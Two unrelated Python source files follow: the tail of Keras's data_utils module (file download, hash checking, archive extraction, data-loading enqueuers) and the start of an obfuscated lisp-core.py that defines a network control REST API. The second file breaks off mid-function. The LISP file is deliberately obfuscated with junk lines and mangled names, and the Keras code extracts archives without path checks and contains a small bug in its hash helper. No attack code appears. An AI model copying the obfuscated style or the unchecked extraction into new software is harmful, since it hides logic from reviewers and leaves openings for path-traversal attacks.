on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
with closing(urlopen(url, data)) as response, open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
# Arguments
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
# Returns
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError,
KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
# Arguments
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored).
# Returns
Path to the downloaded file
""" # noqa
if cache_dir is None:
if 'KERAS_HOME' in os.environ:
cache_dir = os.environ.get('KERAS_HOME')
else:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' +
file_hash + ' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {} : {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt):
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
# Example
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
# Arguments
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
The file hash
"""
if (algorithm == 'sha256') or (algorithm == 'auto' and len(hash) == 64):
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
# Arguments
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
Whether the file is valid
"""
if ((algorithm == 'sha256') or
(algorithm == 'auto' and len(file_hash) == 64)):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`. The method `__getitem__` should return a complete batch.
# Notes
`Sequence` are a safer way to do multiprocessing. This structure guarantees
that the network will only train once on each sample per epoch which is not
the case with generators.
# Examples
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return int(np.ceil(len(self.x) / float(self.batch_size)))
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
use_sequence_api = True
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
# Arguments
index: position of the batch in the Sequence.
# Returns
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
# Returns
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
# Arguments
uid: int, Sequence identifier
i: index
# Returns
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
# Examples
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.close()
```
The `enqueuer.get()` should be an infinite stream of datas.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = mp.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Send current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
sequence: A `keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
return lambda seqs: mp.Pool(workers,
initializer=init_pool,
initargs=(seqs,))
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
future = executor.apply_async(get_index, (self.uid, i))
future.idx = i
self.queue.put(future, block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
try:
future = self.queue.get(block=True)
inputs = future.get(timeout=30)
self.queue.task_done()
except mp.TimeoutError:
idx = future.idx
warnings.warn(
'The input {} could not be retrieved.'
' It could be because a worker has died.'.format(idx),
UserWarning)
inputs = self.sequence[idx]
if inputs is not None:
yield inputs
except Exception:
self.stop()
six.reraise(*sys.exc_info())
def init_pool_generator(gens, random_seed=None):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
if random_seed is not None:
ident = mp.current_process().ident
np.random.seed(random_seed + ident)
def next_sample(uid):
"""Get the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
# Arguments
uid: int, generator identifier
# Returns
The next value of generator `uid`.
"""
return six.next(_SHARED_SEQUENCES[uid])
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, sequence, use_multiprocessing=False, wait_time=None,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(sequence, use_multiprocessing)
self.random_seed = random_seed
if wait_time is not None:
warnings.warn('`wait_time` is not used anymore.',
DeprecationWarning)
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
return lambda seqs: mp.Pool(workers,
initializer=init_pool_generator,
initargs=(seqs, self.random_seed))
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
try:
future = self.queue.get(block=True)
inputs = future.get(timeout=30)
self.queue.task_done()
except mp.TimeoutError:
warnings.warn(
'An input could not be retrieved.'
' It could be because a worker has died.'
'We do not have any information on the lost sample.',
UserWarning)
continue
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
list(map(lambda f: f.wait(), last_ones))
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e:
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
"Your generator is NOT thread-safe."
"Keras requires a thread-safe generator when"
"`use_multiprocessing=False, workers > 1`."
"For more information see issue #1638.")
six.reraise(*sys.exc_info())
|
lisp-core.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import multiprocessing
import threading
import commands
import time
import os
import bottle
from cherrypy import wsgiserver
from cherrypy . wsgiserver . ssl_pyopenssl import pyOpenSSLAdapter
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
import json
import sys
import socket
import thread
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
Oo0o = ""
if 60 - 60: I1ii11iIi11i + I1Ii111 - I11i / i1IIi
Ii1iI = None
Oo = None
I1Ii11I1Ii1i = None
Ooo = [ None , None , None ]
o0oOoO00o = None
if 43 - 43: Ii1I . oO0o
if 27 - 27: OoO0O00 - O0 . I1Ii111 * iII111i - I1ii11iIi11i
if 15 - 15: I1IiiI
if 90 - 90: IiII * i1IIi / Ii1I . OoO0O00 * oO0o
if 16 - 16: ooOoO0o * IiII % I11i . I1Ii111 / IiII % iII111i
if 27 - 27: IiII . i1IIi * OoOoOO00 % Ii1I / i1IIi
if 3 - 3: IiII / ooOoO0o
if 28 - 28: ooOoO0o + I1Ii111 - ooOoO0o . OoooooooOO
@ bottle . route ( '/lisp/api' , method = "get" )
@ bottle . route ( '/lisp/api/<command>' , method = "get" )
@ bottle . route ( '/lisp/api/<command>/<data_structure>' , method = "get" )
def oO0 ( command = "" , data_structure = "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "not-auth" } ] } ]
if 72 - 72: Oo0Ooo % OOooOOo . I1IiiI / I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
if ( bottle . request . auth != None ) :
i1iIIi1 , ii11iIi1I = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( i1iIIi1 , ii11iIi1I ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 6 - 6: OoOoOO00 * iII111i
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( IIIi1i1I ) )
if 67 - 67: ooOoO0o - oO0o * o0oOOo0O0Ooo % o0oOOo0O0Ooo % I11i * OoOoOO00
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 26 - 26: Ii1I - o0oOOo0O0Ooo
if 63 - 63: II111iiii . II111iiii
if 32 - 32: i1IIi . I11i % OoO0O00 . o0oOOo0O0Ooo
if 42 - 42: I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if ( command == "data" and data_structure != "" ) :
II = bottle . request . body . readline ( )
IIIi1i1I = json . loads ( II ) if II != "" else ""
if ( IIIi1i1I != "" ) : IIIi1i1I = IIIi1i1I . values ( ) [ 0 ]
if ( IIIi1i1I == [ ] ) : IIIi1i1I = ""
if 14 - 14: Oo0Ooo . I1IiiI / Ii1I
if ( type ( IIIi1i1I ) == dict and type ( IIIi1i1I . values ( ) [ 0 ] ) == dict ) :
IIIi1i1I = IIIi1i1I . values ( ) [ 0 ]
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
IIIi1i1I = o0o00ooo0 ( data_structure , IIIi1i1I )
return ( IIIi1i1I )
if 96 - 96: O0 % oO0o % iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if ( command != "" ) :
command = "lisp " + command
else :
II = bottle . request . body . readline ( )
if ( II == "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( IIIi1i1I ) )
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
IIIi1i1I = json . loads ( II )
command = IIIi1i1I . keys ( ) [ 0 ]
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( command )
return ( json . dumps ( IIIi1i1I ) )
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
def o00O ( ) :
IIIi1i1I = { }
IIIi1i1I [ "hostname" ] = socket . gethostname ( )
IIIi1i1I [ "system-uptime" ] = commands . getoutput ( "uptime" )
IIIi1i1I [ "lisp-uptime" ] = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
IIIi1i1I [ "lisp-version" ] = lisp . lisp_version
if 69 - 69: oO0o % I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - O0 % OoooooooOO
Iii111II = "yes" if os . path . exists ( "./logs/lisp-traceback.log" ) else "no"
IIIi1i1I [ "traceback-log" ] = Iii111II
if 9 - 9: OoO0O00
i11 = lisp . lisp_myrlocs [ 0 ]
O0oo0OO0oOOOo = lisp . lisp_myrlocs [ 1 ]
i11 = "none" if ( i11 == None ) else i11 . print_address_no_iid ( )
O0oo0OO0oOOOo = "none" if ( O0oo0OO0oOOOo == None ) else O0oo0OO0oOOOo . print_address_no_iid ( )
IIIi1i1I [ "lisp-rlocs" ] = [ i11 , O0oo0OO0oOOOo ]
return ( json . dumps ( IIIi1i1I ) )
if 35 - 35: IiII % I1IiiI
if 70 - 70: iII111i * I1ii11iIi11i
if 46 - 46: ooOoO0o / OoO0O00
if 52 - 52: o0oOOo0O0Ooo - OoooooooOO + Ii1I + Ii1I - o0oOOo0O0Ooo / I1Ii111
if 44 - 44: ooOoO0o . i1IIi - I1ii11iIi11i . O0 - ooOoO0o
if 92 - 92: iII111i . I11i + o0oOOo0O0Ooo
if 28 - 28: i1IIi * Oo0Ooo - o0oOOo0O0Ooo * IiII * Ii1I / OoO0O00
if 94 - 94: II111iiii % I1ii11iIi11i / OoOoOO00 * iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
if 70 - 70: Ii1I / I11i . iII111i % Oo0Ooo
if 67 - 67: OoOoOO00 * o0oOOo0O0Ooo . IiII - OoO0O00 * o0oOOo0O0Ooo
if 46 - 46: OOooOOo + OoOoOO00 . I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
def o0o00ooo0 ( data_structure , data ) :
iI1ii1Ii = [ "site-cache" , "map-cache" , "system" , "map-resolver" ,
"map-server" , "database-mapping" ]
if 92 - 92: OoOoOO00
if ( data_structure not in iI1ii1Ii ) : return ( json . dumps ( [ ] ) )
if 26 - 26: iII111i . I1Ii111
if 68 - 68: OoO0O00
if 35 - 35: OoO0O00 - iII111i / Oo0Ooo / OoOoOO00
if 24 - 24: ooOoO0o - ooOoO0o / II111iiii - I1ii11iIi11i
if ( data_structure == "system" ) : return ( o00O ( ) )
if 69 - 69: oO0o . I1Ii111 + Ii1I / Oo0Ooo - oO0o
if 63 - 63: OOooOOo % oO0o * oO0o * OoO0O00 / I1ii11iIi11i
if 74 - 74: II111iiii
if 75 - 75: o0oOOo0O0Ooo . ooOoO0o
if ( data != "" ) : data = json . dumps ( data )
Oo0O00Oo0o0 = lisp . lisp_api_ipc ( "lisp-core" , data_structure + "%" + data )
if 87 - 87: ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if ( data_structure in [ "map-cache" , "map-resolver" ] ) :
if ( lisp . lisp_is_running ( "lisp-rtr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-rtr" )
elif ( lisp . lisp_is_running ( "lisp-itr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-itr" )
else :
return ( json . dumps ( [ ] ) )
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if ( data_structure in [ "map-server" , "database-mapping" ] ) :
if ( lisp . lisp_is_running ( "lisp-etr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-etr" )
elif ( lisp . lisp_is_running ( "lisp-itr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-itr" )
else :
return ( json . dumps ( [ ] ) )
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
if ( data_structure == "site-cache" ) :
if ( lisp . lisp_is_running ( "lisp-ms" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-ms" )
else :
return ( json . dumps ( [ ] ) )
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
lisp . lprint ( "Waiting for api get-data '{}', parmameters: '{}'" . format ( data_structure , data ) )
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
iIii , ooo0O , oOoO0o00OO0 , i1I1ii = lisp . lisp_receive ( Oo , True )
lisp . lisp_ipc_lock . release ( )
return ( i1I1ii )
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
@ bottle . route ( '/lisp/api' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "delete" )
def I1111IIi ( command = "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "not-auth" } ] } ]
if ( bottle . request . auth == None ) : return ( IIIi1i1I )
if 93 - 93: OoooooooOO / I1IiiI % i11iIiiIii + I1ii11iIi11i * OoO0O00
if 15 - 15: I11i . OoO0O00 / Oo0Ooo + I11i
if 78 - 78: O0 . oO0o . II111iiii % OOooOOo
if 49 - 49: Ii1I / OoO0O00 . II111iiii
if ( bottle . request . auth != None ) :
i1iIIi1 , ii11iIi1I = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( i1iIIi1 , ii11iIi1I ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 68 - 68: i11iIiiIii % I1ii11iIi11i + i11iIiiIii
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( IIIi1i1I ) )
if 31 - 31: II111iiii . I1IiiI
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if ( command == "user-account" ) :
if ( lispconfig . lisp_is_user_superuser ( i1iIIi1 ) == False ) :
